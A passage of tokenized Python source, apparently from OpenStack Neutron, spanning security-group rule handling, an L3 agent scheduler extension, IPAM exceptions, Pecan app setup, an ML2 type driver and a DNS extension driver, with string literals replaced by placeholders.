'<STR_LIT>' ] <EOL> self . _validate_port_range ( rule ) <EOL> self . _validate_ip_prefix ( rule ) <EOL> self . _validate_ethertype_and_protocol ( rule ) <EOL> if rule [ '<STR_LIT>' ] and rule [ '<STR_LIT>' ] : <EOL> raise ext_sg . SecurityGroupRemoteGroupAndRemoteIpPrefix ( ) <EOL> remote_group_id = rule [ '<STR_LIT>' ] <EOL> if remote_group_id : <EOL> self . get_security_group ( context , remote_group_id , <EOL> tenant_id = rule [ '<STR_LIT>' ] ) <EOL> security_group_id = rule [ '<STR_LIT>' ] <EOL> self . get_security_group ( context , security_group_id , <EOL> tenant_id = rule [ '<STR_LIT>' ] ) <EOL> return security_group_id <EOL> def _validate_security_group_rules ( self , context , security_group_rules ) : <EOL> sg_id = self . _validate_single_tenant_and_group ( security_group_rules ) <EOL> for rule in security_group_rules [ '<STR_LIT>' ] : <EOL> self . 
_validate_security_group_rule ( context , rule ) <EOL> return sg_id <EOL> def _make_security_group_rule_dict ( self , security_group_rule , fields = None ) : <EOL> res = { '<STR_LIT:id>' : security_group_rule [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group_rule [ '<STR_LIT>' ] } <EOL> self . _apply_dict_extend_functions ( ext_sg . SECURITYGROUPRULES , res , <EOL> security_group_rule ) <EOL> return self . _fields ( res , fields ) <EOL> def _make_security_group_rule_filter_dict ( self , security_group_rule ) : <EOL> sgr = security_group_rule [ '<STR_LIT>' ] <EOL> res = { '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT>' : [ sgr [ '<STR_LIT>' ] ] } <EOL> include_if_present = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' ] <EOL> for key in include_if_present : <EOL> value = sgr . get ( key ) <EOL> if value : <EOL> res [ key ] = [ value ] <EOL> value = sgr . get ( '<STR_LIT>' ) <EOL> if value : <EOL> res [ '<STR_LIT>' ] = self . _get_ip_proto_name_and_num ( value ) <EOL> return res <EOL> def _rules_equal ( self , rule1 , rule2 ) : <EOL> """<STR_LIT>""" <EOL> rule1_copy = rule1 . copy ( ) <EOL> rule2_copy = rule2 . copy ( ) <EOL> rule1_copy . pop ( '<STR_LIT:id>' , None ) <EOL> rule2_copy . 
pop ( '<STR_LIT:id>' , None ) <EOL> return rule1_copy == rule2_copy <EOL> def _check_for_duplicate_rules ( self , context , security_group_rules ) : <EOL> for i in security_group_rules : <EOL> found_self = False <EOL> for j in security_group_rules : <EOL> if self . _rules_equal ( i [ '<STR_LIT>' ] , <EOL> j [ '<STR_LIT>' ] ) : <EOL> if found_self : <EOL> raise ext_sg . DuplicateSecurityGroupRuleInPost ( rule = i ) <EOL> found_self = True <EOL> self . _check_for_duplicate_rules_in_db ( context , i ) <EOL> def _check_for_duplicate_rules_in_db ( self , context , security_group_rule ) : <EOL> filters = self . _make_security_group_rule_filter_dict ( <EOL> security_group_rule ) <EOL> keys = security_group_rule [ '<STR_LIT>' ] . keys ( ) <EOL> fields = list ( keys ) + [ '<STR_LIT:id>' ] <EOL> db_rules = self . get_security_group_rules ( context , filters , <EOL> fields = fields ) <EOL> rule_dict = security_group_rule [ '<STR_LIT>' ] . copy ( ) <EOL> rule_dict . pop ( '<STR_LIT:id>' , None ) <EOL> sg_protocol = rule_dict . pop ( '<STR_LIT>' , None ) <EOL> for db_rule in db_rules : <EOL> rule_id = db_rule . pop ( '<STR_LIT:id>' , None ) <EOL> db_protocol = db_rule . pop ( '<STR_LIT>' , None ) <EOL> is_protocol_matching = ( <EOL> self . _get_ip_proto_name_and_num ( db_protocol ) == <EOL> self . _get_ip_proto_name_and_num ( sg_protocol ) ) <EOL> if ( is_protocol_matching and rule_dict == db_rule ) : <EOL> raise ext_sg . SecurityGroupRuleExists ( rule_id = rule_id ) <EOL> def _validate_ip_prefix ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> input_prefix = rule [ '<STR_LIT>' ] <EOL> if input_prefix : <EOL> addr = netaddr . IPNetwork ( input_prefix ) <EOL> rule [ '<STR_LIT>' ] = str ( addr ) <EOL> if rule [ '<STR_LIT>' ] != "<STR_LIT>" % ( addr . version ) : <EOL> raise ext_sg . 
SecurityGroupRuleParameterConflict ( <EOL> ethertype = rule [ '<STR_LIT>' ] , cidr = input_prefix ) <EOL> def get_security_group_rules ( self , context , filters = None , fields = None , <EOL> sorts = None , limit = None , marker = None , <EOL> page_reverse = False ) : <EOL> marker_obj = self . _get_marker_obj ( context , '<STR_LIT>' , <EOL> limit , marker ) <EOL> return self . _get_collection ( context , <EOL> SecurityGroupRule , <EOL> self . _make_security_group_rule_dict , <EOL> filters = filters , fields = fields , <EOL> sorts = sorts , <EOL> limit = limit , marker_obj = marker_obj , <EOL> page_reverse = page_reverse ) <EOL> def get_security_group_rules_count ( self , context , filters = None ) : <EOL> return self . _get_collection_count ( context , SecurityGroupRule , <EOL> filters = filters ) <EOL> def get_security_group_rule ( self , context , id , fields = None ) : <EOL> security_group_rule = self . _get_security_group_rule ( context , id ) <EOL> return self . _make_security_group_rule_dict ( security_group_rule , fields ) <EOL> def _get_security_group_rule ( self , context , id ) : <EOL> try : <EOL> query = self . _model_query ( context , SecurityGroupRule ) <EOL> sgr = query . filter ( SecurityGroupRule . id == id ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupRuleNotFound ( id = id ) <EOL> return sgr <EOL> def delete_security_group_rule ( self , context , id ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . BEFORE_DELETE , id = id , <EOL> exc_cls = ext_sg . SecurityGroupRuleInUse , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> query = self . _model_query ( context , SecurityGroupRule ) . filter ( <EOL> SecurityGroupRule . id == id ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . PRECOMMIT_DELETE , <EOL> exc_cls = ext_sg . 
SecurityGroupRuleInUse , id = id , <EOL> ** kwargs ) <EOL> try : <EOL> context . session . delete ( query . one ( ) ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupRuleNotFound ( id = id ) <EOL> registry . notify ( <EOL> resources . SECURITY_GROUP_RULE , events . AFTER_DELETE , self , <EOL> ** kwargs ) <EOL> def _extend_port_dict_security_group ( self , port_res , port_db ) : <EOL> security_group_ids = [ sec_group_mapping [ '<STR_LIT>' ] for <EOL> sec_group_mapping in port_db . security_groups ] <EOL> port_res [ ext_sg . SECURITYGROUPS ] = security_group_ids <EOL> return port_res <EOL> db_base_plugin_v2 . NeutronDbPluginV2 . register_dict_extend_funcs ( <EOL> attributes . PORTS , [ '<STR_LIT>' ] ) <EOL> def _process_port_create_security_group ( self , context , port , <EOL> security_group_ids ) : <EOL> if validators . is_attr_set ( security_group_ids ) : <EOL> for security_group_id in security_group_ids : <EOL> self . _create_port_security_group_binding ( context , port [ '<STR_LIT:id>' ] , <EOL> security_group_id ) <EOL> port [ ext_sg . SECURITYGROUPS ] = ( security_group_ids and <EOL> list ( security_group_ids ) or [ ] ) <EOL> def _ensure_default_security_group ( self , context , tenant_id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> query = self . _model_query ( context , DefaultSecurityGroup ) <EOL> default_group = query . filter_by ( tenant_id = tenant_id ) . one ( ) <EOL> return default_group [ '<STR_LIT>' ] <EOL> except exc . NoResultFound : <EOL> return self . _create_default_security_group ( context , tenant_id ) <EOL> def _create_default_security_group ( self , context , tenant_id ) : <EOL> security_group = { <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT:description>' : _ ( '<STR_LIT>' ) } <EOL> } <EOL> try : <EOL> security_group = self . 
create_security_group ( <EOL> context , security_group , default_sg = True ) <EOL> return security_group [ '<STR_LIT:id>' ] <EOL> except db_exc . DBDuplicateEntry as ex : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , ex . value ) <EOL> raise db_exc . RetryRequest ( ex ) <EOL> def _get_security_groups_on_port ( self , context , port ) : <EOL> """<STR_LIT>""" <EOL> port = port [ '<STR_LIT:port>' ] <EOL> if not validators . is_attr_set ( port . get ( ext_sg . SECURITYGROUPS ) ) : <EOL> return <EOL> if port . get ( '<STR_LIT>' ) and utils . is_port_trusted ( port ) : <EOL> return <EOL> port_sg = port . get ( ext_sg . SECURITYGROUPS , [ ] ) <EOL> filters = { '<STR_LIT:id>' : port_sg } <EOL> tenant_id = port . get ( '<STR_LIT>' ) <EOL> if tenant_id : <EOL> filters [ '<STR_LIT>' ] = [ tenant_id ] <EOL> valid_groups = set ( g [ '<STR_LIT:id>' ] for g in <EOL> self . get_security_groups ( context , fields = [ '<STR_LIT:id>' ] , <EOL> filters = filters ) ) <EOL> requested_groups = set ( port_sg ) <EOL> port_sg_missing = requested_groups - valid_groups <EOL> if port_sg_missing : <EOL> raise ext_sg . SecurityGroupNotFound ( id = '<STR_LIT:U+002CU+0020>' . join ( port_sg_missing ) ) <EOL> return requested_groups <EOL> def _ensure_default_security_group_on_port ( self , context , port ) : <EOL> port = port [ '<STR_LIT:port>' ] <EOL> if port . get ( '<STR_LIT>' ) and utils . is_port_trusted ( port ) : <EOL> return <EOL> default_sg = self . _ensure_default_security_group ( context , <EOL> port [ '<STR_LIT>' ] ) <EOL> if not validators . is_attr_set ( port . get ( ext_sg . SECURITYGROUPS ) ) : <EOL> port [ ext_sg . SECURITYGROUPS ] = [ default_sg ] <EOL> def _check_update_deletes_security_groups ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if ( ext_sg . SECURITYGROUPS in port [ '<STR_LIT:port>' ] and <EOL> not ( validators . is_attr_set ( port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] ) <EOL> and port [ '<STR_LIT:port>' ] [ ext_sg . 
SECURITYGROUPS ] != [ ] ) ) : <EOL> return True <EOL> return False <EOL> def _check_update_has_security_groups ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if ( ext_sg . SECURITYGROUPS in port [ '<STR_LIT:port>' ] and <EOL> ( validators . is_attr_set ( port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] ) and <EOL> port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] != [ ] ) ) : <EOL> return True <EOL> return False <EOL> def update_security_group_on_port ( self , context , id , port , <EOL> original_port , updated_port ) : <EOL> """<STR_LIT>""" <EOL> need_notify = False <EOL> port_updates = port [ '<STR_LIT:port>' ] <EOL> if ( ext_sg . SECURITYGROUPS in port_updates and <EOL> not utils . compare_elements ( <EOL> original_port . get ( ext_sg . SECURITYGROUPS ) , <EOL> port_updates [ ext_sg . SECURITYGROUPS ] ) ) : <EOL> port_updates [ ext_sg . SECURITYGROUPS ] = ( <EOL> self . _get_security_groups_on_port ( context , port ) ) <EOL> self . _delete_port_security_group_bindings ( context , id ) <EOL> self . _process_port_create_security_group ( <EOL> context , <EOL> updated_port , <EOL> port_updates [ ext_sg . SECURITYGROUPS ] ) <EOL> need_notify = True <EOL> else : <EOL> updated_port [ ext_sg . SECURITYGROUPS ] = ( <EOL> original_port [ ext_sg . SECURITYGROUPS ] ) <EOL> return need_notify </s>
<s> import abc <EOL> from neutron_lib import constants <EOL> from neutron_lib import exceptions <EOL> from oslo_log import log as logging <EOL> import webob . exc <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . api import extensions <EOL> from neutron . api . v2 import base <EOL> from neutron . api . v2 import resource <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron . extensions import agent <EOL> from neutron import manager <EOL> from neutron . plugins . common import constants as service_constants <EOL> from neutron import policy <EOL> from neutron import wsgi <EOL> LOG = logging . getLogger ( __name__ ) <EOL> L3_ROUTER = '<STR_LIT>' <EOL> L3_ROUTERS = L3_ROUTER + '<STR_LIT:s>' <EOL> L3_AGENT = '<STR_LIT>' <EOL> L3_AGENTS = L3_AGENT + '<STR_LIT:s>' <EOL> class RouterSchedulerController ( wsgi . Controller ) : <EOL> def get_plugin ( self ) : <EOL> plugin = manager . NeutronManager . get_service_plugins ( ) . get ( <EOL> service_constants . L3_ROUTER_NAT ) <EOL> if not plugin : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise webob . exc . HTTPNotFound ( msg ) <EOL> return plugin <EOL> def index ( self , request , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTERS , <EOL> { } ) <EOL> return plugin . list_routers_on_l3_agent ( <EOL> request . context , kwargs [ '<STR_LIT>' ] ) <EOL> def create ( self , request , body , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTER , <EOL> { } ) <EOL> agent_id = kwargs [ '<STR_LIT>' ] <EOL> router_id = body [ '<STR_LIT>' ] <EOL> result = plugin . add_router_to_l3_agent ( request . context , agent_id , <EOL> router_id ) <EOL> notify ( request . context , '<STR_LIT>' , router_id , agent_id ) <EOL> return result <EOL> def delete ( self , request , id , ** kwargs ) : <EOL> plugin = self . 
get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTER , <EOL> { } ) <EOL> agent_id = kwargs [ '<STR_LIT>' ] <EOL> result = plugin . remove_router_from_l3_agent ( request . context , agent_id , <EOL> id ) <EOL> notify ( request . context , '<STR_LIT>' , id , agent_id ) <EOL> return result <EOL> class L3AgentsHostingRouterController ( wsgi . Controller ) : <EOL> def get_plugin ( self ) : <EOL> plugin = manager . NeutronManager . get_service_plugins ( ) . get ( <EOL> service_constants . L3_ROUTER_NAT ) <EOL> if not plugin : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise webob . exc . HTTPNotFound ( msg ) <EOL> return plugin <EOL> def index ( self , request , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_AGENTS , <EOL> { } ) <EOL> return plugin . list_l3_agents_hosting_router ( <EOL> request . context , kwargs [ '<STR_LIT>' ] ) <EOL> class L3agentscheduler ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_name ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_alias ( cls ) : <EOL> return constants . L3_AGENT_SCHEDULER_EXT_ALIAS <EOL> @ classmethod <EOL> def get_description ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_updated ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_resources ( cls ) : <EOL> """<STR_LIT>""" <EOL> exts = [ ] <EOL> parent = dict ( member_name = "<STR_LIT>" , <EOL> collection_name = "<STR_LIT>" ) <EOL> controller = resource . Resource ( RouterSchedulerController ( ) , <EOL> base . FAULT_MAP ) <EOL> exts . append ( extensions . ResourceExtension ( <EOL> L3_ROUTERS , controller , parent ) ) <EOL> parent = dict ( member_name = "<STR_LIT>" , <EOL> collection_name = "<STR_LIT>" ) <EOL> controller = resource . Resource ( L3AgentsHostingRouterController ( ) , <EOL> base . 
FAULT_MAP ) <EOL> exts . append ( extensions . ResourceExtension ( <EOL> L3_AGENTS , controller , parent ) ) <EOL> return exts <EOL> def get_extended_resources ( self , version ) : <EOL> return { } <EOL> class InvalidL3Agent ( agent . AgentNotFound ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class RouterHostedByL3Agent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterSchedulingFailed ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterReschedulingFailed ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterL3AgentMismatch ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DVRL3CannotAssignToDvrAgent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DVRL3CannotRemoveFromDvrAgent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class L3AgentSchedulerPluginBase ( object ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def add_router_to_l3_agent ( self , context , id , router_id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def remove_router_from_l3_agent ( self , context , id , router_id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def list_routers_on_l3_agent ( self , context , id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def list_l3_agents_hosting_router ( self , context , router_id ) : <EOL> pass <EOL> def notify ( context , action , router_id , agent_id ) : <EOL> info = { '<STR_LIT:id>' : agent_id , '<STR_LIT>' : router_id } <EOL> notifier = n_rpc . get_notifier ( '<STR_LIT>' ) <EOL> notifier . info ( context , action , { '<STR_LIT>' : info } ) </s>
<s> from neutron_lib import exceptions <EOL> from neutron . _i18n import _ <EOL> class InvalidSubnetRequestType ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class AddressCalculationFailure ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class InvalidAddressType ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpAddressAllocationNotFound ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class IpAddressAlreadyAllocated ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class InvalidIpForSubnet ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class InvalidAddressRequest ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class InvalidSubnetRequest ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AllocationOnAutoAddressSubnet ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class IpAddressGenerationFailure ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IPAllocationFailed ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpamAvailabilityRangeNoChanges ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpamValueInvalid ( exceptions . Conflict ) : <EOL> def __init__ ( self , message = None ) : <EOL> self . message = message <EOL> super ( IpamValueInvalid , self ) . __init__ ( ) </s>
<s> from keystonemiddleware import auth_token <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_middleware import cors <EOL> from oslo_middleware import request_id <EOL> import pecan <EOL> from neutron . api import versions <EOL> from neutron . pecan_wsgi import hooks <EOL> from neutron . pecan_wsgi import startup <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def setup_app ( * args , ** kwargs ) : <EOL> config = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:port>' : CONF . bind_port , <EOL> '<STR_LIT:host>' : CONF . bind_host <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:root>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } <EOL> } <EOL> pecan_config = pecan . configuration . conf_from_dict ( config ) <EOL> app_hooks = [ <EOL> hooks . ExceptionTranslationHook ( ) , <EOL> hooks . ContextHook ( ) , <EOL> hooks . BodyValidationHook ( ) , <EOL> hooks . OwnershipValidationHook ( ) , <EOL> hooks . QuotaEnforcementHook ( ) , <EOL> hooks . NotifierHook ( ) , <EOL> hooks . PolicyHook ( ) , <EOL> ] <EOL> app = pecan . make_app ( <EOL> pecan_config . app . root , <EOL> debug = False , <EOL> wrap_app = _wrap_app , <EOL> force_canonical = False , <EOL> hooks = app_hooks , <EOL> guess_content_type_from_ext = True <EOL> ) <EOL> startup . initialize_all ( ) <EOL> return app <EOL> def _wrap_app ( app ) : <EOL> app = request_id . RequestId ( app ) <EOL> if cfg . CONF . auth_strategy == '<STR_LIT>' : <EOL> pass <EOL> elif cfg . CONF . auth_strategy == '<STR_LIT>' : <EOL> app = auth_token . AuthProtocol ( app , { } ) <EOL> else : <EOL> raise n_exc . InvalidConfigurationOption ( <EOL> opt_name = '<STR_LIT>' , opt_value = cfg . CONF . auth_strategy ) <EOL> app = versions . Versions ( app ) <EOL> app = cors . CORS ( app , cfg . CONF ) <EOL> app . 
set_latent ( <EOL> allow_headers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> allow_methods = [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> expose_headers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> ) <EOL> return app </s>
<s> import random <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import log <EOL> from neutron . _i18n import _LE <EOL> from neutron . common import exceptions as exc <EOL> from neutron . common import utils <EOL> from neutron . plugins . common import utils as p_utils <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> LOG = log . getLogger ( __name__ ) <EOL> IDPOOL_SELECT_SIZE = <NUM_LIT:100> <EOL> class BaseTypeDriver ( api . TypeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> try : <EOL> self . physnet_mtus = utils . parse_mappings ( <EOL> cfg . CONF . ml2 . physical_network_mtus , unique_values = False <EOL> ) <EOL> except Exception as e : <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , e ) <EOL> self . physnet_mtus = [ ] <EOL> def get_mtu ( self , physical_network = None ) : <EOL> return p_utils . get_deployment_physnet_mtu ( ) <EOL> class SegmentTypeDriver ( BaseTypeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model ) : <EOL> super ( SegmentTypeDriver , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . primary_keys = set ( dict ( model . __table__ . columns ) ) <EOL> self . primary_keys . remove ( "<STR_LIT>" ) <EOL> def allocate_fully_specified_segment ( self , session , ** raw_segment ) : <EOL> """<STR_LIT>""" <EOL> network_type = self . get_type ( ) <EOL> try : <EOL> with session . begin ( subtransactions = True ) : <EOL> alloc = ( session . query ( self . model ) . filter_by ( ** raw_segment ) . <EOL> first ( ) ) <EOL> if alloc : <EOL> if alloc . allocated : <EOL> return <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> count = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** raw_segment ) . <EOL> update ( { "<STR_LIT>" : True } ) ) <EOL> if count : <EOL> LOG . 
debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> alloc = self . model ( allocated = True , ** raw_segment ) <EOL> alloc . save ( session ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> except db_exc . DBDuplicateEntry : <EOL> alloc = None <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> def allocate_partially_specified_segment ( self , session , ** filters ) : <EOL> """<STR_LIT>""" <EOL> network_type = self . get_type ( ) <EOL> with session . begin ( subtransactions = True ) : <EOL> select = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** filters ) ) <EOL> allocs = select . limit ( IDPOOL_SELECT_SIZE ) . all ( ) <EOL> if not allocs : <EOL> return <EOL> alloc = random . choice ( allocs ) <EOL> raw_segment = dict ( ( k , alloc [ k ] ) for k in self . primary_keys ) <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> count = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** raw_segment ) . <EOL> update ( { "<STR_LIT>" : True } ) ) <EOL> if count : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> raise db_exc . RetryRequest ( <EOL> exc . NoNetworkFoundInMaximumAllowedAttempts ( ) ) </s>
<s> import sys <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from neutron . common import config as common_config <EOL> from neutron . common import utils as n_utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> cfg . CONF . import_group ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _main_modules = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> } <EOL> def main ( ) : <EOL> common_config . init ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> driver_name = cfg . CONF . OVS . of_interface <EOL> mod_name = _main_modules [ driver_name ] <EOL> mod = importutils . import_module ( mod_name ) <EOL> mod . init_config ( ) <EOL> common_config . setup_logging ( ) <EOL> n_utils . log_opt_values ( LOG ) <EOL> mod . main ( ) </s>
<s> from neutron_lib . api import validators <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from neutron . _i18n import _LE , _LI <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . db import dns_db <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import dns <EOL> from neutron import manager <EOL> from neutron . plugins . common import utils as plugin_utils <EOL> from neutron . plugins . ml2 import db <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> from neutron . services . externaldns import driver <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class DNSExtensionDriver ( api . ExtensionDriver ) : <EOL> _supported_extension_alias = '<STR_LIT>' <EOL> @ property <EOL> def extension_alias ( self ) : <EOL> return self . _supported_extension_alias <EOL> def process_create_network ( self , plugin_context , request_data , db_data ) : <EOL> dns_domain = request_data . get ( dns . DNSDOMAIN ) <EOL> if not validators . is_attr_set ( dns_domain ) : <EOL> return <EOL> if dns_domain : <EOL> plugin_context . session . add ( dns_db . NetworkDNSDomain ( <EOL> network_id = db_data [ '<STR_LIT:id>' ] , dns_domain = dns_domain ) ) <EOL> db_data [ dns . DNSDOMAIN ] = dns_domain <EOL> def process_update_network ( self , plugin_context , request_data , db_data ) : <EOL> new_value = request_data . get ( dns . DNSDOMAIN ) <EOL> if not validators . is_attr_set ( new_value ) : <EOL> return <EOL> current_dns_domain = db_data . get ( dns . DNSDOMAIN ) <EOL> if current_dns_domain == new_value : <EOL> return <EOL> net_id = db_data [ '<STR_LIT:id>' ] <EOL> if current_dns_domain : <EOL> net_dns_domain = plugin_context . session . query ( <EOL> dns_db . NetworkDNSDomain ) . filter_by ( network_id = net_id ) . one ( ) <EOL> if new_value : <EOL> net_dns_domain [ '<STR_LIT>' ] = new_value <EOL> db_data [ dns . 
